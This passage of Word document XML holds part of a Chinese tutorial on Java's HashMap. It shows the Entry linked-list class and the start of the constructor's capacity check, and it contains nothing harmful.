          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>指向</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>轴方向其下一个元素</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我们来看看</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>代码：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ab"/>
        <w:tblW w:w="8627" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8627"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A54B0" w:rsidRPr="00F41A4C" w:rsidTr="00816497">
        <w:trPr>
          <w:trHeight w:val="2130"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8627" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003A54B0" w:rsidRPr="00F41A4C" w:rsidRDefault="003A54B0" w:rsidP="00ED0BCD">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:pBdr>
                <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="5C5C5C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="006699"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>static</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="006699"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>class</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t> Entry&lt;K,V&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="006699"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>implements</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t> Map.Entry&lt;K,V&gt; {  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003A54B0" w:rsidRPr="00F41A4C" w:rsidRDefault="003A54B0" w:rsidP="00ED0BCD">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:pBdr>
                <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
              <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="5C5C5C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>        </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="006699"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>final</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t> K key;  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003A54B0" w:rsidRPr="00F41A4C" w:rsidRDefault="003A54B0" w:rsidP="00ED0BCD">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:pBdr>
                <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="5C5C5C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>        V value;  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003A54B0" w:rsidRPr="00F41A4C" w:rsidRDefault="003A54B0" w:rsidP="00ED0BCD">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:pBdr>
                <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
              <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="5C5C5C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>        </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="006699"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>final</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="006699"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t> hash;  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003A54B0" w:rsidRPr="00F41A4C" w:rsidRDefault="003A54B0" w:rsidP="00ED0BCD">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:pBdr>
                <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="5C5C5C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>        Entry&lt;K,V&gt; next;  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003A54B0" w:rsidRPr="00F41A4C" w:rsidRDefault="003A54B0" w:rsidP="00ED0BCD">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:pBdr>
                <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
              <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="5C5C5C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>..........  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003A54B0" w:rsidRPr="00F41A4C" w:rsidRDefault="003A54B0" w:rsidP="00ED0BCD">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:pBdr>
                <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="5C5C5C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003A54B0" w:rsidRPr="00F41A4C" w:rsidRDefault="003A54B0" w:rsidP="003A54B0">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003A54B0" w:rsidRPr="00F41A4C" w:rsidRDefault="003A54B0" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上面的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>就是数组中的元素，它持有一个指向下一个元素的引用，这就构成了链表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00042902">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00042902">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>public HashMap(int initialCapacity, float loadFactor) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00042902">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>[java]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tooltip="view plain" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>view plain</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId15" w:tooltip="copy" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="A0A0A0"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>copy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> (initialCapacity &lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042902" w:rsidRPr="00F41A4C" w:rsidRDefault="00042902" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>throw</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
